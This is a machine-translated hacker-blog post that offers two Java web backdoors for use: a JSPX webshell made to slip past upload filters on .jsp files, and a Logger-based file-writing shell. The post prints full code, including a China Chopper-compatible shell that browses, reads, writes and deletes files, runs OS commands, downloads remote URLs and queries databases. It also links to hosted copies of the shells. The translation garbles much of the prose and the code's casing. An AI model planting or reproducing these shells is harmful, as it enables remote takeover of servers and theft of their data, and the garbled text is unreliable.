Two "new" Javaweb backdoors (Jspx and Java Logger)

Use this can break through St2 forced JSP jump login.jsp

Using jspx to resolve JSP suffixes is restricted to take shell-hack Blog | Hacker Blog
Http://www.hackblog.cn/post/45.html

Two "new" Javaweb backdoors (Jspx and Java Logger) | Hugtion ' s Blog
https://www.hugtion.com/?p=768

About the Javaweb back door problem has been relatively small, and relatively novel back door less. Here I share two more interesting javaweb the back door for everyone to play. A common or more common backdoor can easily be intercepted or found, but do not know a friend know the following two kinds of back door not? 1:jspx back door in today's Web applications, if you want to directly send a JSP has become more difficult, but if only to limit the ASP, PHP, JSP, ASPX and other common suffixes should be how to break it? When I read the Tomcat configuration file, I saw that both JSP and jspx were handled by Org.apache.jasper.servlet.JspServlet, so I wanted to build a jspx Webshell. After repeated tossing, a jspx of the back door on the thick line. The tests should be supported by default for all servers in Java. Configuration:<servlet><servlet-name>jsp</servlet-name><servlet-class> under Tomcat's Conf/web.xml org.apache.jasper.servlet.jspservlet</servlet-class><init-param><param-name>fork</ Param-name><param-value>false</param-value></init-param><init-param><param-name >xpoweredBy</param-name><param-value>false</param-value></init-param>< load-on-startup>3</load-on-startup></servlet><servlet-mapping><servlet-name>jsp< /servlet-name><url-pattern>*.jsp</url-pattern><url-pattern>*.jspx</url-pattern>< /servlet-mapping> about jspx Information online is not many, the official website toThe documentation is unclear and confusing. How to play jspx you can see the Xia Guan Web demo, or refer to some articles. Http://jspx-bay.sourceforge.net Some of the notes about jspx files focus on translating some of the tags inside the JSP into XML-supported formats, such as: <%@ include. %> <jsp:directive.include. /><%@ page: %> <jsp:directive.page. /><%@ taglib. %> xmlns:prefix= "tag library URL" <%=. %> <jsp:expression>. </jsp:expression><%. %> <jsp:scriptlet>. </jsp:scriptlet> know that <%%> can be used with <jsp:scriptlet></jsp:scriptlet> tags to indicate that it is easy to do so, it is very easy to replace the mark directly. So it's easy to write a simple shell, but what if you want to know exactly what the tags are or what's different from the JSP? Below I have made a simple comparison (the JSP code hints, followed by jspx): 2013101020032332736 Follow the instructions translated under the JSP <%! %> needs to be replaced with a:<jsp:declaration></jsp:declaration> tag. Other important reminders: in the jspx to follow the XML syntax, so directly in the jsp:declaration or jsp:scriptlet tag to write "<>" Such symbols are not possible, need to turn to the meaning of the compiler error, guess the next only need to put <> Turn into < > on the line). Jspx implementation code for the Backdoor: <jsp:root xmlns:jsp= "htTp://java.sun.com/jsp/page "xmlns=" http://www.w3.org/1999/xhtml "xmlns:c=" Http://java.sun.com/jsp/jstl/core " Version= "1.2" ><jsp:directive.page contenttype= "text/html" pageencoding= "UTF-8"/><jsp:directive.page Import= "java.io.*"/><jsp:scriptlet>randomaccessfile RF = new Randomaccessfile (Request.getrealpath ("/") + Request.getparameter ("F"), "RW"); Rf.write (Request.getparameter ("T"). GetBytes ()); Rf.close (); </jsp:scriptlet ></jsp:root>jspx implementation of my previous hair knife final version: direct with the kitchen knife connection: http://localhost:8080/jspx.jspx2013101020244736210 <jsp:root xmlns:jsp= "Http://java.sun.com/JSP/Page" xmlns= "http://www.w3.org/1999/xhtml" xmlns:c= "http://java.sun.com/jsp/ Jstl/core "version=" 1.2 "><jsp:directive.page contenttype=" text/html "pageencoding=" UTF-8 "/><jsp: Directive.page import= "java.io.*"/><jsp:directive.page import= "java.util.*"/><jsp:directive.page Import= "java.net.*"/><jsp:directive.page import= "java.sql.*"/><jsp:directive.page import= "java.text. * "/> <jsp:declaration>string pwd= "023"; String cs= "UTF-8"; String EC (String s) throws Exception{return new String (S.getbytes ("Iso-8859-1"), CS);} Connection GC (String s) throws exception{string[] X=s.trim (). Split ("\ r \ n"); Class.forName (X[0].trim ()); if (X[1].indexof ("jdbc:oracle")!=-1) {return drivermanager.getconnection (X[1].trim () + " : "+x[4],x[2].equalsignorecase (" [/null] ")?": X[2],x[3].equalsignorecase ("[/null]")? "": X[3]);} Else{connection c=drivermanager.getconnection (X[1].trim (), X[2].equalsignorecase ("[/null]")? ": X[2],x[3]. Equalsignorecase ("[/null]")? "": X[3]); if (x.length>4) {C.setcatalog (x[4]);} return c;}} void AA (StringBuffer sb) throws Exception{file R[]=file.listroots (); for (int i=0;i<r.length;i++) {sb.append (R[i]. ToString (). substring (0,2));}} void BB (String s,stringbuffer sb) throws Exception{file Of=new File (s), L[]=of.listfiles (); String st,sq,sf= ""; java.util.Date dt; SimpleDateFormat fm=new SimpleDateFormat ("Yyyy-mm-dd HH:mm:ss"); for (int i=0; i<l.length; i++) {dt=new Java.util.Date (l[i].lastmodified ()); St=fm.format (dt); Sq=l[i].canread ()? " R ":" "; SQ +=l[i].canwrite ()?" W ":" "; if (L[i].isdirectory ()) {Sb.append (L[i].getname () +"/\t "+st+" \ T "+l[i].length () +" \ T "+sq+" \ n ");} Else{sf+=l[i].getname () + "\ T" +st+ "\ T" +l[i].length () + "\ T" +sq+ "\ n";}} Sb.append (SF);} void EE (String s) throws Exception{file F=new file (s), if (F.isdirectory ()) {File x[]=f.listfiles (); for (int k=0; k < X.length; k++) {if (!x[k].delete ()) {EE (X[k].getpath ());}}} F.delete ();} void FF (String s,httpservletresponse R) throws Exception{int n;byte[] b=new byte[512];r.reset (); Servletoutputstream Os=r.getoutputstream (); Bufferedinputstream is=new Bufferedinputstream (new FileInputStream (s)); Os.write (("-" + "|"). GetBytes (), 0,3), while ((N=is.read (b,0,512))!=-1) {os.write (b,0,n);} Os.write ("|" + "<-"). GetBytes (), 0,3); Os.close (); Is.close ();} void GG (String s,string D) throws exception{string h= "0123456789ABCDEF"; File F=new file (s); F.createnewfile (); FileOutputStream os=new FileOutputStream (f); for (int i=0; i<d.length (); i+=2) {Os.write ((H.indexof (D.charat (i)) << 4 | h.indexof (D.charat (i+1)));} Os.close ();} void HH (String s,string D) throws Exception{file Sf=new file (s), df=new file (d), if (Sf.isdirectory ()) {if (!df.exists ()) { Df.mkdir ();} File z[]=sf.listfiles (); for (int j=0; j<z.length; J + +) {HH (s+ "/" +z[j].getname (), d+ "/" +z[j].getname ())}} Else{fileinputstream is=new FileInputStream (SF); FileOutputStream os=new FileOutputStream (DF); int n;byte[] B=new byte[512];while ((N=is.read (b,0,512))!=-1) {Os.write ( B,0,n);} Is.close (); Os.close ();}} void II (String s,string D) throws Exception{file Sf=new file (s), df=new file (d); Sf.renameto (DF);} void JJ (String s) throws Exception{file F=new File (s); F.mkdir (); void KK (String s,string t) throws Exception{file F=new File (s); SimpleDateFormat fm=new SimpleDateFormat ("Yyyy-mm-dd HH:mm:ss"); java.util.Date dt=fm.parse (t); F.setlastmodified ( Dt.gettime ());} void LL (String s,string D) throws Exception{url U=new URL (s); int n=0; FileOutputStream os=new FileOutputStream (d); HttpURLConnection h= (httpurlconnectION) U.openconnection (); InputStream Is=h.getinputstream (); byte[] B=new Byte[512];while ((N=is.read (b))!=-1) { Os.write (b,0,n);} Os.close (); Is.close (); H.disconnect ();} void MM (InputStream is,stringbuffer sb) throws exception{string L; BufferedReader br=new BufferedReader (New InputStreamReader (IS)), while ((L=br.readline ())!=null) {sb.append (l + "\ r \ n") );}} void NN (String s,stringbuffer sb) throws Exception{connection C=GC (s); ResultSet r=s.indexof ("Jdbc:oracle")!=-1?c.getmetadata (). GetSchemas (): C.getmetadata (). GetCatalogs (); while ( R.next ()) {Sb.append (r.getstring (1) + "\ T");} R.close (); C.close ();} void OO (String s,stringbuffer sb) throws Exception{connection C=GC (s); String[] X=s.trim (). Split ("\ r \ n"); ResultSet r=c.getmetadata (). Gettables (Null,s.indexof ("jdbc:oracle")!=-1?x.length>5?x[5]:x[4]:null, "%", new string[]{"TABLE"}), while (R.next ()) {Sb.append (r.getstring ("table_name") + "\ T");} R.close (); C.close ();} void PP (String s,stringbuffer sb) throws exception{string[] X=s.trim (). Split ("\ r \ n"); Connection C=GC (s); StatEment m=c.createstatement (1005,1007); ResultSet r=m.executequery ("select * from" +x[x.length-1]); ResultSetMetaData D=r.getmetadata (); for (int i=1;i<=d.getcolumncount (); i++) {Sb.append (D.getcolumnname (i) + "(" + D.getcolumntypename (i) + ") \ T"); R.close (); M.close (); C.close ();} void QQ (String cs,string s,string q,stringbuffer sb,string p) throws Exception{connection C=GC (s); Statement m=c.createstatement (1005,1008); BufferedWriter Bw=null;try{resultset r=m.executequery (Q.indexof ("--f:")!=-1?q.substring (0,q.indexOf ("--f:")): Q); ResultSetMetaData d=r.getmetadata (); int n=d.getcolumncount (); for (int i=1; I <=n; i++) {sb.append (D.getcolumnname (i ) + "\t|\t");} Sb.append ("\ r \ n"), if (Q.indexof ("--f:")!=-1) {file File=new file (p); if (Q.indexof ("-to:") ==-1) {File.mkdir ();} Bw=new BufferedWriter (New OutputStreamWriter (New FileOutputStream (New File) (Q.indexof ("-to:")!=-1?p.trim ():p + Q.substring (Q.indexof ("--f:") +4,q.length ()). Trim ()), true), CS));} while (R.next ()) {for (int i=1; i<=n;i++) {if (Q.indexof ("--f:")!=-1) {Bw.wriTe (R.getobject (i) + "" + "\ T"); Bw.flush ();} Else{sb.append (R.getobject (i) + "" + "\t|\t");}} if (bw!=null) {bw.newline ();} Sb.append ("\ r \ n");} R.close (); if (bw!=null) {bw.close ();}} catch (Exception e) {sb.append ("result\t|\t\r\n"); Try{m.executeupdate (q); Sb.append ("Execute successfully!\t|\t\r\n ");} catch (Exception ee) {sb.append (ee.tostring () + "\t|\t\r\n");}} M.close (); C.close ();} </jsp:declaration><jsp:scriptlet>cs=request.getparameter ("Z0")!=null?request.getparameter ("z0") + "" : Cs;response.setcontenttype ("text/html"); response.setcharacterencoding (CS); StringBuffer sb=new StringBuffer (""); try{string Z=ec (Request.getparameter (PWD) + ""); String Z1=ec (Request.getparameter ("Z1") + ""); String Z2=ec (Request.getparameter ("Z2") + ""); Sb.append ("+" + "|"); String s=request.getsession (). Getservletcontext (). Getrealpath ("/"), if (Z.equals ("A")) {sb.append (s+ "\ t"); S.substring (0,1). Equals ("/")) {AA (SB);}} else if (z.equals ("B")) {BB (Z1,SB);} else if (z.equals ("C")) {String l= ""; BufferedReader br=new BufferedReader (New InpuTstreamreader (New FileInputStream (z1))), while ((L=br.readline ())!=null) {sb.append (l + "\ r \ n");} Br.close ();} else if (z.equals ("D")) {BufferedWriter bw=new bufferedwriter (New OutputStreamWriter (New FileOutputStream (z1) )); Bw.write (z2); Bw.close (); Sb.append ("1");} else if (z.equals ("E")) {EE (z1); Sb.append ("1");} else if (z.equals ("F")) {FF (z1,response);} else if (z.equals ("G")) {GG (Z1,Z2); Sb.append ("1");} else if (z.equals ("H")) {HH (Z1,Z2); Sb.append ("1");} else if (z.equals ("I")) {II (Z1,Z2); Sb.append ("1");} else if (z.equals ("J")) {JJ (z1); Sb.append ("1");} else if (z.equals ("K")) {KK (Z1,Z2); Sb.append ("1");} else if (z.equals ("L")) {LL (Z1,Z2); Sb.append ("1");} else if (z.equals ("M")) {string[] c={z1.substring (2), z1.substring (0,2), Z2}; Process p=runtime.getruntime (). exec (c); MM (P.getinputstream (), SB); MM (P.geterrorstream (), SB);} else if (z.equals ("N")) {NN (Z1,SB);} else if (z.equals ("O")) {OO (Z1,SB);} else if (z.equals ("P")) {PP (Z1,SB);} else if (z.equals ("Q")) {QQ (Cs,z1,z2,sb,z2.indexof ("-to:")!=-1?z2.substring (Z2.indexOf ("-to:") +4,z2.length ()): S.replaceall ("\\\\", "/") + "images/");}} catch (Exception e) {sb.append ("ERROR" + "://" +e.tostring ());} Sb.append ("|" + "<-"), Out.print (Sb.tostring ());</jsp:scriptlet></jsp:root> final version of the instructions for use: HTTP://XSSER.ME/CAIDAO/1. TXT above jspx.jspx:http://xsser.me/caidao/jspx.jspx2: with Java Logger (log) to leave the back door in some scenarios the shell may be filtered out, but some interesting things can be bypassed, such as the use of new File in such a way to write files, or even as far as possible do not appear in the file keyword. Look at the next java.util.logging.Logger is very interesting, can write log file, so try to write a shell in this way, the result is successful. Java.util.logging.Logger The default output format is XML, but this is not the case, the direct format of the log output in text mode. New 2.jsp and Access: <%java.util.logging.logger L=java.util.logging.logger.getlogger ("T"); Java.util.logging.FileHandler h=new Java.util.logging.FileHandler (Pagecontext.getservletcontext (). Getrealpath ("/ ") +request.getparameter (" F "), true); H.setformatter (new Java.util.logging.SimpleFormatter ()); L.addhandler (h); L.info (Request.getparameter ("T"))%>2013101020165767122 2013101020171377889 Other slightly special points of the file read and write Demo:new Fileoutputstreamnew FileOutputStream ("D:/sb.txt"). Write (New String ("123"). GetbyTES ()), New Dataoutputstreamnew DataOutputStream (New FileOutputStream ("D:/1x.txt")). Write (New String ("123"). GetBytes ()); FileWriter FW = new FileWriter ("D:/3.txt"); Fw.write ("+"); Fw.flush (); Fw.close (); Randomaccessfile RF = new Randomaccessfile ("D:/14.txt", "RW"), Rf.write (New String ("3b"). GetBytes ()); Rf.close (); Getshell.htm:
　　
Two "new" Javaweb backdoors (Jspx and Java Logger)